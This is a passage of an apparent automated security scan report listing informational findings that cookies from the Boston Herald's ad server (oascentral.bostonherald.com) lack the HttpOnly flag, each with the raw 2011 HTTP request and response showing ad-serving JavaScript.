Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.518. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.519. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.520. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.521. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.522. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/811190172/x14/BostonHerald/DisneyContest2011_BHHP_234x60/DCL_234_60.jpg/726348
...[SNIP]...

11.523. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x15&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/864039057/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/7263485
...[SNIP]...

11.524. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x16&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 415
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/932976519/x16/BostonHerald/FridayThrowdown_234x60/FridayThrowdown0610_234x60.j
...[SNIP]...

11.525. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011Pizw3O101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011Pizw3O101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

11.526. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.527. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.528. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.529. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...

11.530. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.531. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.532. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

